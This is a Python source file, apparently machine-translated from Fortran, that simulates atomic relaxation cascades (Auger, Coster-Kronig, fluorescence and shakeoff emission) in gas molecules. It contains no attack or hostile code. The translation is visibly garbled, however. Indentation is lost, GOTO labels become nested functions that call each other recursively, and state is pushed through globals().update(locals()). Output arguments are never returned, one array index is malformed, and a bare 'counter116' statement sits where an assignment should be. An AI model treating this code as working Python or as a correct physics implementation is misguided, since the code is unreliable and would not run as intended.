R3=random.uniform(0.0,1.0)
THET=numpy.arccos(1.0-2.0*R3)
elif(NDVEC == 0):
# RANDOM EMISSION IN THE X-Y PLANE
THET=API/2.0
elif(NDVEC == 1):
# EMISSION ALONG Z AXIS
THET=0.00
elif(NDVEC == -1):
# EMISSION ALONG -Z AXIS
THET=numpy.arccos(-1.00)
else:
print(' ERROR NDVEC NOT CORRECT SUBROUTINE STOPPED:')
sys.exit()
# endif
R3=random.uniform(0.0,1.0)
PHI=TWOPI*R3
DRXE[int(NVAC)][1]=numpy.sin(THET)*numpy.cos(PHI)
DRYE[int(NVAC)][1]=numpy.sin(THET)*numpy.sin(PHI)
DRZE[int(NVAC)][1]=numpy.cos(THET)
# endif
#
THESEC=API-THET
if(PHI < API):
PHISEC=API+PHI
else:
PHISEC=PHI-API
# endif
globals().update(locals())
print("calc IFIRST=",IFIRST)
complete=GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
print("got this ",complete)
return complete
globals().update(locals())
GOTO66(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
globals().update(locals())
complete=GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
if(complete):
return
print(' ERROR IN CASCADE 0')
sys.exit()
# end
def CALC1(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,L1):
# IMPLICIT #real*8(A-H,O-Z)
# IMPLICIT #integer*8(I-N)
# SCR=""
# SCR1=""
#COMMON/GENCAS/
global ELEV#[17,79]
global NSDEG#(17)
global AA#[17]
global BB#[17]
global SCR,SCR1
#COMMON/MIXC/
global PRSH#(6,3,17,17)
global ESH#(6,3,17)
global AUG#(6,3,17,17,17)
global RAD#[6,3,17,17]
global PRSHBT#(6,3,17)
global IZ#[6,3]
global INIOCC#(6,3,17)
global ISHLMX#(6,3)
global AMZ#[6,3]
#COMMON/UPD/
global NOCC#(6,3,17)
global AUGR#(6,3,17,17,17)
global RADR#(6,3,17,17)
#COMMON/CALCAS/
global IONSUM0#(10)
global IFLSUM0#(10)
global ESTORE0#(10,28)
global EPHOTON0#(10,28)
global DRXE0#(10,28)
global DRYE0#(10,28)
global DRZE0#(10,28)
global DRX0#(10,28)
global DRY0#(10,28)
global DRZ0#(10,28)
#COMMON/CALCAS1/
global IONSUM#(10)
global IFLSUM#(10)
global ESTORE#(10,28)
global EPHOTON#(10,28)
global DRXE#(10,28)
global DRYE#(10,28)
global DRZE#(10,28)
global DRX#(10,28)
global DRY#(10,28)
global DRZ#[10,28]
#DIMENSION
TEMP=[0 for x in range(17)]
TEMP1=[0 for x in range(289)]
#
# CALCULATE CASCADE IN GAS KGAS AND MOLECULAR COMPONENT LGAS
# WITH INTIAL ENERGY DEPOSIT ELECEN AND SHELL VACANCY CREATED AT ISHELL
#
ISTART=IONSUM[int(NVAC)]
ISTARTF=IFLSUM[int(NVAC)]
API=numpy.arccos(-1.00)
TWOPI=2.00*API
def GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
ELEFT=ELECEN
INIT=1
# SET STARTING ARRAY NOCC EQUAL TO INIOCC
for I in range(1,17+1):
NOCC[int(KGAS)][int(LGAS)][I]=INIOCC[int(KGAS)][int(LGAS)][I]
IONSUM[int(NVAC)]=ISTART+1
IFLSUM[int(NVAC)]=ISTARTF
# STORE PHOTOELECTRON ENERGY AND ANGLE
ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ELECEN-ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]
ELECN=ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]
ELEFT=ELEFT-ELECN
NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]-1
# USE PHOTELECTRON ANGULAR DISTRIBUTION
APE=AA[ISHELL]
BPE=BB[ISHELL]
ANGGEN(APE,BPE,THET)
if(THET < 0.0):
THET=THET+API
R3=random.uniform(0.0,1.0)
PHI=TWOPI*R3
DRCOS(DRX0[int(NVAC)][L1],DRY0[int(NVAC)][L1],DRZ0[int(NVAC)][L1],THET,PHI,DRXX,DRYY,DRZZ)
DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=DRXX
DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=DRYY
DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=DRZZ
# LOOP AROUND CASCADE
def GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
# CHECK FOR ELECTRON SHAKEOFF
IDUM=1
if(INIT > 1):
ELECN=ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]
INSUM=IONSUM[int(NVAC)]
globals().update(locals())
SHAKE(ISHELL,ELECN,KGAS,LGAS,ESHK,IDUM,INSUM,JVAC)
# CALCULATE ENERGY OF ELECTRON
if(JVAC == 0):
pass
else:
# ELECTRON + SHAKEOFF
ELECN=ELECN-ESHK-ELEV[JVAC][IZ[int(KGAS)][int(LGAS)]]
ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ELECN
IONSUM[int(NVAC)]=IONSUM[int(NVAC)]+1
# MAXIMUM ION CHARGE STATE =28
if(IONSUM[int(NVAC)]> 28) :
print(' 1ST GEN LIMITED TO 28 IN THIS VERSION IONSUM=',IONSUM[int(NVAC)])
sys.exit()
# endif
ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ESHK
ELEFT=ELEFT-ESHK-ELEV[JVAC][IZ[KGAS,LGAS]]
if(ELEFT < 0.0):
globals().update(locals())
complete=GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
return 1
# RANDOM EMISSION DIRECTION
R3=random.uniform(0.0,1.0)
THET=numpy.arccos(1.0-2.0*R3)
R4=random.uniform(0.0,1.0)
PHI=TWOPI*R4
DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.cos(PHI)
DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.sin(PHI)
DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.cos(THET)
def GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
UPDATE(KGAS,LGAS,ISHELL)
INIT=2
# CHOOSE FLUORESCENCE OR AUGER TRANSITION
TSUM=0.0
for I in range(1,17+1):
TSUM=TSUM+RADR[int(KGAS)][int(LGAS)][ISHELL][I]
for J in range(1,17+1):
TSUM=TSUM+AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J]
# NO MORE TRANSITIONS POSSIBLE
if(TSUM == 0.0):
return
# NORMALISE TO 1.0
for I in range(1,17+1):
RADR[int(KGAS)][int(LGAS)][ISHELL][I]=RADR[int(KGAS)][int(LGAS)][ISHELL][I]/TSUM
for J in range(1,17+1):
AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J]=AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J]/TSUM
# CREATE CUMULATIVE SUM ARRAY
TEMP[1]=RADR[int(KGAS)][int(LGAS)][ISHELL][1]
for I in range(2,17+1):
TEMP[I]=RADR[int(KGAS)][int(LGAS)][ISHELL][I]+TEMP[I-1]
TEMP1[1]=AUGR[int(KGAS)][int(LGAS)][ISHELL][1][1]
for I in range(2,17+1):
TEMP1[I]=AUGR[int(KGAS)][int(LGAS)][ISHELL][I][1]+TEMP1[I-1]
for J in range(1,16+1):
for I in range(1,17+1):
TEMP1[I+(J*17)]=AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J+1]+TEMP1[I+(J*17)-1]
# FIND FLUORESCENCE OR AUGER TRANSITION
R1=random.uniform(0.0,1.0)
for I in range(1,17+1):
if(R1 < TEMP[I]) :
# STORE PHOTON ENERGY AND ANGLE : UPDATE NOCC
IFLSUM[int(NVAC)]=IFLSUM[int(NVAC)]+1
EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]]=ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]-ELEV[I][IZ[int(KGAS)][int(LGAS)]]
ELEFT=ELEFT-EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]]
if(ELEFT < 0.0):
globals().update(locals())
complete=GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
return complete
# RANDOM EMISSION DIRECTION
R3=random.uniform(0.0,1.0)
THET=numpy.arccos(1.0-2.0*R3)
R4=random.uniform(0.0,1.0)
PHI=TWOPI*R4
DRX[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.sin(THET)*numpy.cos(PHI)
DRY[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.sin(THET)*numpy.sin(PHI)
DRZ[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.cos(THET)
NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]+1
NOCC[int(KGAS)][int(LGAS)][I]=NOCC[int(KGAS)][int(LGAS)][I]-1
# FIND LOWEST VACANCY
globals().update(locals())
VACANCY(KGAS,LGAS,ISHELL,ILAST)
if(ILAST == 1):
# NO MORE TRANSITIONS POSSIBLE
return
# endif
globals().update(locals())
GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
globals().update(locals())
return 1
# endif
GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
counter116=1
while(counter116):
counter116=0
R2=R1-TEMP[17]
for J in range(1,17+1):
if(counter116):
break
for I in range(1,17+1):
if(R2 < TEMP1[I+((J-1)*17)]) :
# AUGER OR COSTER KRONIG
# STORE EJECTED ELECTRON AND UPDATE NOCC
ETEMP=ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]-(ELEV[I][IZ[int(KGAS)][int(LGAS)]]+ELEV[I][IZ[int(KGAS)][int(LGAS)]+1])*0.5-(ELEV[J][IZ[int(KGAS)][int(LGAS)]]+ELEV[J][IZ[int(KGAS)][int(LGAS)]+1])*0.5
if(ETEMP < 0.0):
# DO NOT ALLOW NEGATIVE ENERGY TRANSITIONS
counter117=1
while(counter117):
counter117=0
R1=random.uniform(0.0,1.0)
if(R1 < TEMP[17]):
counter117=1
counter116=1
break
# endif
IONSUM[int(NVAC)]=IONSUM[int(NVAC)]+1
if(IONSUM[int(NVAC)]> 28) :
print(' 2ND GEN IONS LIMITED TO 28 IN THIS VERSION IONSUM=',IONSUM[int(NVAC)]) #34602
sys.exit()
# endif
ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ETEMP
ELEFT=ELEFT-ETEMP
if(ELEFT < 0.0):
globals().update(locals())
complete=GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
return complete
# RANDOM EMISSION DIRECTION
R3=random.uniform(0.0,1.0)
THET=numpy.arccos(1.0-2.0*R3)
R4=random.uniform(0.0,1.0)
PHI=TWOPI*R4
DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.cos(PHI)
DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.sin(PHI)
DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.cos(THET)
NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]+1
NOCC[int(KGAS)][int(LGAS)][I]=NOCC[int(KGAS)][int(LGAS)][I]-1
NOCC[int(KGAS)][int(LGAS)][J]=NOCC[int(KGAS)][int(LGAS)][J]-1
# FIND LOWEST VACANCY
globals().update(locals())
VACANCY(KGAS,LGAS,ISHELL,ILAST)
if(ILAST == 1):
# NO MORE TRANSITIONS POSSIBLE
return
# endif
globals().update(locals())
GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
# endif
globals().update(locals())
GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
globals().update(locals())
GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
print(' ERROR IN CASCADE 1')
sys.exit()
# end
def CALC2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,L1):
# IMPLICIT #real*8(A-H,O-Z)
# IMPLICIT #integer*8(I-N)
# SCR=""
# SCR1=""
#COMMON/GENCAS/
global ELEV#[17,79]
global NSDEG#(17)
global AA#[17]
global BB#[17]
global SCR,SCR1
#COMMON/MIXC/
global PRSH#(6,3,17,17)
global ESH#(6,3,17)
global AUG#(6,3,17,17,17)
global RAD#[6,3,17,17]
global PRSHBT#(6,3,17)
global IZ#[6,3]
global INIOCC#(6,3,17)
global ISHLMX#(6,3)
global AMZ#[6,3]
#COMMON/UPD/
global NOCC#(6,3,17)
global AUGR#(6,3,17,17,17)
global RADR#(6,3,17,17)
#COMMON/CALCAS/
global IONSUM0#(10)
global IFLSUM0#(10)
global ESTORE0#(10,28)
global EPHOTON0#(10,28)
global DRXE0#(10,28)
global DRYE0#(10,28)
global DRZE0#(10,28)
global DRX0#(10,28)
global DRY0#(10,28)
global DRZ0#(10,28)
#COMMON/CALCAS1/
global IONSUM#(10)
global IFLSUM#(10)
global ESTORE#(10,28)
global EPHOTON#(10,28)
global DRXE#(10,28)
global DRYE#(10,28)
global DRZE#(10,28)
global DRX#(10,28)
global DRY#(10,28)
global DRZ#[10,28]
#DIMENSION
TEMP=[0 for x in range(17)]
TEMP1=[0 for x in range(289)]
#
# CALCULATE CASCADE IN GAS KGAS AND MOLECULAR COMPONENT LGAS
# WITH INTIAL ENERGY DEPOSIT ELECEN AND SHELL VACANCY CREATED AT ISHELL
#
ISTART=IONSUM[int(NVAC)]
ISTARTF=IFLSUM[int(NVAC)]
API=numpy.arccos(-1.00)
TWOPI=2.00*API
def GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
ELEFT=ELECEN
INIT=1
# SET STARTING ARRAY NOCC EQUAL TO INIOCC
for I in range(1,17+1):
NOCC[int(KGAS)][int(LGAS)][I]=INIOCC[int(KGAS)][int(LGAS)][I]
IONSUM[int(NVAC)]=ISTART+1
IFLSUM[int(NVAC)]=ISTARTF
# STORE INITIAL PHOTELECTRON AND ANGLE
ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ELECEN-ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]
ELECN=ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]
ELEFT=ELEFT-ELECN
NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]-1
# USE PHOTOELECTRON ANGULAR DISTRIBUTION
APE=AA[ISHELL]
BPE=BB[ISHELL]
ANGGEN(APE,BPE,THET)
if(THET < 0.0):
THET=THET+API
R3=random.uniform(0.0,1.0)
PHI=TWOPI*R3
DRCOS(DRX0[int(NVAC)][L1],DRY0[int(NVAC)][L1],DRZ0[int(NVAC)][L1],THET,PHI,DRXX,DRYY,DRZZ)
DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=DRXX
DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=DRYY
DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=DRZZ
# LOOP AROUND CASCADE
def GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
# CHECK FOR ELECTRON SHAKEOFF
IDUM=1
if(INIT > 1):
ELECN=ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]
INSUM=IONSUM[int(NVAC)]
SHAKE(ISHELL,ELECN,KGAS,LGAS,ESHK,IDUM,INSUM,JVAC)
# CALCULATE ENERGY OF ELECTRON
if(JVAC == 0):
pass
else:
# ELECTRON + SHAKEOFF
ELECN=ELECN-ESHK-ELEV[JVAC][IZ[int(KGAS)][int(LGAS)]]
ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ELECN
IONSUM[int(NVAC)]=IONSUM[int(NVAC)]+1
# MAXIMUM ION CHARGE STATE =28
if(IONSUM[int(NVAC)]> 28) :
print(' 2ND GEN IONS LIMITED TO 28 IN THIS VERSION IONSUM=',IONSUM[int(NVAC)])
sys.exit()
# endif
ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ESHK
ELEFT=ELEFT-ESHK-ELEV[JVAC][IZ[int(KGAS)][int(LGAS)]]
if(ELEFT < 0.0):
GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
# RANDOM EMISSION DIRECTION
R3=random.uniform(0.0,1.0)
THET=numpy.arccos(1.0-2.0*R3)
R4=random.uniform(0.0,1.0)
PHI=TWOPI*R4
DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.cos(PHI)
DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.sin(PHI)
DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.cos(THET)
def GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
UPDATE(KGAS,LGAS,ISHELL)
INIT=2
# CHOOSE FLUORESCENCE OR AUGER TRANSITION
TSUM=0.0
for I in range(1,17+1):
TSUM=TSUM+RADR[int(KGAS)][int(LGAS)][ISHELL][I]
for J in range(1,17+1):
TSUM=TSUM+AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J]
# NO MORE TRANSITIONS POSSIBLE
if(TSUM == 0.0):
return
# NORMALISE TO 1.0
for I in range(1,17+1):
RADR[int(KGAS)][int(LGAS)][ISHELL][I]=RADR[int(KGAS)][int(LGAS)][ISHELL][I]/TSUM
for J in range(1,17+1):
AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J]=AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J]/TSUM
# CREATE CUMULATIVE SUM ARRAY
TEMP[1]=RADR[int(KGAS)][int(LGAS)][ISHELL][1]
for I in range(2,17+1):
TEMP[I]=RADR[int(KGAS)][int(LGAS)][ISHELL][I]+TEMP[I-1]
TEMP1[1]=AUGR[int(KGAS)][int(LGAS)][ISHELL][1][1]
for I in range(2,17+1):
TEMP1[I]=AUGR[int(KGAS)][int(LGAS)][ISHELL][I][1]+TEMP1[I-1]
for J in range(1,16+1):
for I in range(1,17+1):
TEMP1[I+(J*17)]=AUGR[int(KGAS)][int(LGAS)][ISHELL][I][(J+1)]+TEMP1[I+(J*17)-1]
# FIND FLUORESCENCE OR AUGER TRANSITION
R1=random.uniform(0.0,1.0)
for I in range(1,17+1):
if(R1 < TEMP[I]) :
# STORE PHOTON ENERGY AND UPDATE NOCC
IFLSUM[int(NVAC)]=IFLSUM[int(NVAC)]+1
EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]]=ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]-ELEV[I][IZ[int(KGAS)][int(LGAS)]]
if(EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]] < 0.0):
print(' EPHOTON=','%.3f' % EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]],' NVAC=',NVAC,' IN CALC2')
ELEFT=ELEFT-EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]]
if(ELEFT < 0.0):
GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
# RANDOM EMISSION DIRECTION
R3=random.uniform(0.0,1.0)
THET=numpy.arccos(1.0-2.0*R3)
R4=random.uniform(0.0,1.0)
PHI=TWOPI*R4
DRX[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.sin(THET)*numpy.cos(PHI)
DRY[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.sin(THET)*numpy.sin(PHI)
DRZ[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.cos(THET)
NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]+1
NOCC[int(KGAS)][int(LGAS)][I]=NOCC[int(KGAS)][int(LGAS)][I]-1
# FIND LOWEST VACANCY
VACANCY(KGAS,LGAS,ISHELL,ILAST)
if(ILAST == 1):
# NO MORE TRANSITIONS POSSIBLE
return
# endif
GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
# endif
GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
counter116
while(counter116):
counter116=0
R2=R1-TEMP[17]
for J in range(1,17+1):
if(counter116):
break
for I in range(1,17+1):
if(R2 < TEMP1[I+((J-1)*17)]) :
# AUGER OR COSTER KRONIG
# STORE EJECTED ELECTRON AND UPDATE NOCC
ETEMP=ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]-(ELEV[I][IZ[int(KGAS)][int(LGAS)]]+ELEV[I][IZ[int(KGAS)][int(LGAS)]+1])*0.5-(ELEV[J][IZ[int(KGAS)][int(LGAS)]]+ELEV[J][IZ[int(KGAS)][int(LGAS)]+1])*0.5
if(ETEMP < 0.0):
# DO NOT ALLOW NEGATIVE ENERGY TRANSITIONS
counter117=1
while(counter117):
counter117=0
R1=random.uniform(0.0,1.0)
if(R1 < TEMP[17]):
counter117=1
counter116=1 #34598
break
# endif
IONSUM[int(NVAC)]=IONSUM[int(NVAC)]+1
if(IONSUM[int(NVAC)]> 28) :
print(' 2ND GEN IONS LIMITED TO 28 IN THIS VERSION IONSUM=',IONSUM[int(NVAC)])
sys.exit()
# endif
ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ETEMP
ELEFT=ELEFT-ETEMP
if(ELEFT < 0.0):
GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
# RANDOM EMISSION DIRECTION
R3=random.uniform(0.0,1.0)
THET=numpy.arccos(1.0-2.0*R3)
R4=random.uniform(0.0,1.0)
PHI=TWOPI*R4
DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.cos(PHI)
DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.sin(PHI)
DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.cos(THET)
NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]+1
NOCC[int(KGAS)][int(LGAS)][I]=NOCC[int(KGAS)][int(LGAS)][I]-1
NOCC[int(KGAS)][int(LGAS)][J]=NOCC[int(KGAS)][int(LGAS)][J]-1
# FIND LOWEST VACANCY
VACANCY(KGAS,LGAS,ISHELL,ILAST)
if(ILAST == 1):
# NO MORE TRANSITIONS POSSIBLE
return
# endif
GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
# endif
GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
print(' ERROR IN CASCADE 2')
sys.exit()
# end
def CALC3(NVAC,KGAS,LGAS,ELECEN,ISHELL,L1):
# IMPLICIT #real*8(A-H,O-Z)
# IMPLICIT #integer*8(I-N)
#CHARACTER*6
# SCR="",
# SCR1=""
#COMMON/GENCAS/
global ELEV#[17,79]
global NSDEG#[17]
global AA#[17]
global BB#[17]
global SCR,SCR1
#COMMON/MIXC/
global PRSH#(6,3,17,17)
global ESH#(6,3,17)
global AUG#(6,3,17,17,17)
global RAD#[6,3,17,17]
global PRSHBT#(6,3,17)
global IZ#[6,3]
global INIOCC#(6,3,17)
global ISHLMX#(6,3)
global AMZ#[6,3]
#COMMON/UPD/
global NOCC#(6,3,17)
global AUGR#(6,3,17,17,17)
global RADR#(6,3,17,17)
#COMMON/CALCAS2/
global IONSUM0#(10)
global IFLSUM0#(10)
global ESTORE0#(10,28)
global EPHOTON0#(10,28)
global DRXE0#(10,28)
global DRYE0#(10,28)
global DRZE0#(10,28)
global DRX0#(10,28)
global DRY0#(10,28)
global DRZ0#(10,28)
#COMMON/CALCAS3/
global IONSUM#(10)
global IFLSUM#(10)
global ESTORE#(10,28)
global EPHOTON#(10,28)
global DRXE#(10,28)
global DRYE#(10,28)
global DRZE#(10,28)
global DRX#(10,28)
global DRY#(10,28)
global DRZ#[10,28]
TEMP=[0 for x in range(18)]
TEMP1=[0 for x in range(289)]
#
# CALCULATE CASCADE IN GAS KGAS AND MOLECULAR COMPONENT LGAS
# WITH INTIAL ENERGY DEPOSIT ELECEN AND SHELL VACANCY CREATED AT ISHELL
#
ISTART=IONSUM[int(NVAC)]
ISTARTF=IFLSUM[int(NVAC)]
API=numpy.arccos(-1.00)
TWOPI=2.00*API
def GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
ELEFT=ELECEN
INIT=1
# SET STARTING ARRAY NOCC EQUAL TO INIOCC
for I in range(1,17+1):
NOCC[int(KGAS)][int(LGAS)][I]=INIOCC[int(KGAS)][int(LGAS)][I]
IONSUM[int(NVAC)]=ISTART+1
IFLSUM[int(NVAC)]=ISTARTF
# STORE PHOTOELECTRON ENERGY AND ANGLE
ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ELECEN-ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]
ELECN=ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]
ELEFT=ELEFT-ELECN
NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]-1
# USE PHOTOELECTRON ANGULAR DISTRIBUTION
APE=AA[ISHELL]
BPE=BB[ISHELL]
ANGGEN(APE,BPE,THET)
if(THET < 0.0):
THET=THET+API
R3=random.uniform(0.0,1.0)
PHI=TWOPI*R3
DRCOS(DRX0[int(NVAC)][L1],DRY0[int(NVAC)][L1],DRZ0[int(NVAC)][L1],THET,PHI,DRXX,DRYY,DRZZ)
DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=DRXX
DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=DRYY
DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=DRZZ
# LOOP AROUND CASCADE
def GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
# CHECK FOR ELECTRON SHAKEOFF
IDUM=1
if(INIT > 1):
ELECN=ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]
INSUM=IONSUM[int(NVAC)]
SHAKE(ISHELL,ELECN,KGAS,LGAS,ESHK,IDUM,INSUM,JVAC)
# CALCULATE ENERGY OF ELECTRON
if(JVAC == 0):
GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
# ELECTRON + SHAKEOFF
ELECN=ELECN-ESHK-ELEV[JVAC][IZ[int(KGAS)][int(LGAS)]]
ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ELECN
IONSUM[int(NVAC)]=IONSUM[int(NVAC)]+1
# MAXIMUM ION CHARGE STATE =28
if(IONSUM[int(NVAC)]> 28) :
print(' 3RD GEN ION CHARGE LIMITED TO 28 IONSUM=',IONSUM[int(NVAC)])
sys.exit()
# endif
ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ESHK
ELEFT=ELEFT-ESHK-ELEV[JVAC][IZ[int(KGAS)][int(LGAS)]]
if(ELEFT < 0.0):
GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
# RANDOM EMISSION ANGLE
R3=random.uniform(0.0,1.0)
THET=numpy.arccos(1.0-2.0*R3)
R4=random.uniform(0.0,1.0)
PHI=TWOPI*R4
DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.cos(PHI)
DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.sin(PHI)
DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.cos(THET)
def GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
UPDATE(KGAS,LGAS,ISHELL)
INIT=2
# CHOOSE FLUORESCENCE OR AUGER TRANSITION
TSUM=0.0
for I in range(1,17+1):
TSUM=TSUM+RADR[int(KGAS)][int(LGAS)][ISHELL][I]
for J in range(1,17+1):
TSUM=TSUM+AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J]
# NO MORE TRANSITIONS POSSIBLE
if(TSUM == 0.0):
return
# NORMALISE TO 1.0
for I in range(1,17+1):
RADR[int(KGAS)][int(LGAS)][ISHELL][I]=RADR[int(KGAS)][int(LGAS)][ISHELL][I]/TSUM
for J in range(1,17+1):
AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J]=AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J]/TSUM
# CREATE CUMULATIVE SUM ARRAY
TEMP[1]=RADR[int(KGAS)][int(LGAS)][ISHELL][1]
for I in range(2,17+1):
TEMP[I]=RADR[int(KGAS)][int(LGAS)][ISHELL][I]+TEMP[I-1]
TEMP1[1]=AUGR[int(KGAS)][int(LGAS)][ISHELL][1][1]
for I in range(2,17+1):
TEMP1[I]=AUGR[int(KGAS)][int(LGAS)][ISHELL][I][1]+TEMP1[I-1]
for J in range(1,16+1):
for I in range(1,17+1):
TEMP1[I+(J*17)]=AUGR[int(KGAS)][int(LGAS)][ISHELL][I][(J+1)]+TEMP1[I+(J*17)-1]
# FIND FLUORESCENCE OR AUGER TRANSITION
R1=random.uniform(0.0,1.0)
for I in range(1,17+1):
if(R1 < TEMP[I]) :
# STORE PHOTON ENERGY AND UPDATE NOCC
IFLSUM[int(NVAC)]=IFLSUM[int(NVAC)]+1
EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]]=ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]-ELEV[I][IZ[int(KGAS)][int(LGAS)]]
ELEFT=ELEFT-EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]]
if(ELEFT < 0.0):
GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
# RANDOM EMISSION DIRECTION
